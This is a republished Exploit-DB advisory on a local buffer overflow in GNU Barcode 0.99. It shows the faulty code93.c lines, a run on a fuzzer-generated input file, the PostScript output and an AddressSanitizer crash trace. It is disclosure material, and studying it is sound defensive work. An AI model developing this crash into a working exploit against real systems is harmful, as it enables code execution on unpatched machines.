GNU Barcode 0.99 – Buffer Overflow - 体验盒子

作者： LiquidWorm
日期： 2018-05-29
类别：
local
平台：
linux
来源：https://www.exploit-db.com/exploits/44797/
# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.

# Desc: The vulnerability is caused due to a boundary error in the processing
# of an input file, which can be exploited to cause a buffer overflow when a
# user processes e.g. a specially crafted file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.


code93.c:

165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167: 
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
%heightxpos yposwidth heightxpos yposwidth
 [75.0010.5015.000.85][75.0014.5015.000.85]
 [75.0017.5015.002.85][75.0021.5015.002.85]
 [75.0024.5015.000.85][70.0027.5020.002.85]
 [70.0033.5020.002.85][70.0036.5020.000.85]
 [70.0038.5020.000.85][70.0040.5020.000.85]
 [70.0042.5020.000.85][70.0046.5020.000.85]
 [70.0048.5020.000.85][70.0052.5020.000.85]
 [70.0056.5020.000.85][70.0058.5020.000.85]
 [70.0060.5020.000.85][70.0062.5020.000.85]
 [70.0067.5020.002.85][70.0071.5020.002.85]
 [70.0074.5020.000.85][70.0078.5020.000.85]
 [70.0082.5020.000.85][70.0086.5020.000.85]
 [70.0088.5020.000.85][70.0091.5020.002.85]
 [70.0094.5020.000.85][70.0096.5020.000.85]
 [70.00 100.5020.000.85][70.00 103.5020.002.85]
 [70.00 106.5020.000.85][70.00 110.5020.000.85]
 [70.00 112.5020.000.85][70.00 116.5020.000.85]
 [70.00 120.5020.000.85][70.00 123.5020.002.85]
 [70.00 127.5020.002.85][70.00 130.5020.000.85]
 [70.00 132.5020.000.85][70.00 136.5020.000.85]
 [70.00 138.5020.000.85][70.00 140.5020.000.85]
 [70.00 144.5020.000.85][70.00 148.5020.000.85]
 [70.00 152.5020.000.85][70.00 155.5020.002.85]
 [70.00 158.5020.000.85][70.00 160.5020.000.85]
 [70.00 162.5020.000.85][70.00 167.5020.002.85]
 [70.00 171.5020.002.85][70.00 177.5020.002.85]
 [70.00 180.5020.000.85][70.00 182.5020.000.85]
 [70.00 184.5020.000.85][70.00 187.5020.002.85]
 [70.00 193.5020.002.85][70.00 196.5020.000.85]
 [70.00 198.5020.000.85][70.00 200.5020.000.85]
 [70.00 202.5020.000.85][70.00 204.5020.000.85]
 [70.00 206.5020.000.85][70.00 211.5020.002.85]
 [70.00 215.5020.002.85][70.00 219.5020.002.85]
 [70.00 225.5020.002.85][70.00 228.5020.000.85]
 [70.00 230.5020.000.85][70.00 232.5020.000.85]
 [70.00 235.5020.002.85][70.00 241.5020.002.85]
 [70.00 244.5020.000.85][70.00 246.5020.000.85]
 [70.00 248.5020.000.85][70.00 251.5020.002.85]
 [70.00 257.5020.002.85][70.00 260.5020.000.85]
 [70.00 262.5020.000.85][70.00 264.5020.000.85]
 [70.00 267.5020.002.85][70.00 273.5020.002.85]
 [70.00 276.5020.000.85][70.00 278.5020.000.85]
 [70.00 280.5020.000.85][70.00 283.5020.002.85]
 [70.00 289.5020.002.85][70.00 292.5020.000.85]
 [70.00 294.5020.000.85][70.00 296.5020.000.85]
 [70.00 299.5020.002.85][70.00 305.5020.002.85]
 [70.00 308.5020.000.85][70.00 310.5020.000.85]
 [70.00 312.5020.000.85][70.00 315.5020.002.85]
 [70.00 321.5020.002.85][70.00 324.5020.000.85]
 [70.00 326.5020.000.85][70.00 328.5020.000.85]
 [70.00 331.5020.002.85][70.00 337.5020.002.85]
 [70.00 340.5020.000.85][70.00 342.5020.000.85]
 [70.00 344.5020.000.85][70.00 346.5020.000.85]
 [70.00 349.5020.002.85][70.00 354.5020.000.85]
 [70.00 357.5020.002.85][70.00 360.5020.000.85]
 [70.00 363.5020.002.85][70.00 369.5020.002.85]
 [70.00 372.5020.000.85][70.00 374.5020.000.85]
 [70.00 376.5020.000.85][70.00 379.5020.002.85]
 [70.00 385.5020.002.85][70.00 388.5020.000.85]
 [70.00 390.5020.000.85][70.00 392.5020.000.85]
 [70.00 395.5020.002.85][70.00 398.5020.000.85]
 [70.00 400.5020.000.85][70.00 403.5020.002.85]
 [70.00 408.5020.000.85][75.00 410.5015.000.85]
 [75.00 414.5015.000.85][75.00 417.5015.002.85]
 [75.00 421.5015.002.85][75.00 424.5015.000.85]

]	{ {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% charxpos ypos fontsize
[(W) 32.0010.00 12.00]
[(+) 48.0010.000.00]
[(G) 64.0010.000.00]
[($) 80.0010.000.00]
[(A) 96.0010.000.00]
[(+)112.0010.000.00]
[(M)128.0010.000.00]
[(%)144.0010.000.00]
[(K)160.0010.000.00]
[(W)176.0010.000.00]
[(W)192.0010.000.00]
[(G)208.0010.000.00]
[(W)224.0010.000.00]
[(W)240.0010.000.00]
[(W)256.0010.000.00]
[(W)272.0010.000.00]
[(W)288.0010.000.00]
[(W)304.0010.000.00]
[(W)320.0010.000.00]
[(W)336.0010.000.00]
[(9)352.0010.000.00]
[(W)368.0010.000.00]
[(W)384.0010.000.00]
] { {} forall dup 0.00 ne {
	/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"

showpage
%%Page: 2 2

=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
#0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
#1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
#2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
#3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)

0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
'*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07 
Heap left redzone: fa
Heap right redzone:fb
Freed heap region: fd
Stack left redzone:f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return:f5
Stack use after scope: f8
Global redzone:f9
Global init order: f6
Poisoned by user:f7
Container overflow:fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
==11076==ABORTING